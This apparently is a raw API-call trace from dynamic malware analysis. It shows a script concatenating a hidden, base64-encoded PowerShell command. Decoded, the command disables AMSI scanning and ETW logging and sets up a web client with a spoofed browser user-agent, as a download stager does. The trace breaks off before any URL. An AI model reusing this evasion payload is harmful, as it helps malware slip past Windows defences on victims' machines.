bstrRight="dABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg", bstrRight="AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj", bstrRight="ACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC", bstrRight="wAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA", bstrRight="ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ", bstrRight="A6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.825] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl", bstrRight="AD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.826] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF", bstrRight="MAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.826] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A", bstrRight="dAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.826] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA", bstrRight="BXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.826] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX", bstrRight="ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.826] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH", bstrRight="YAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) 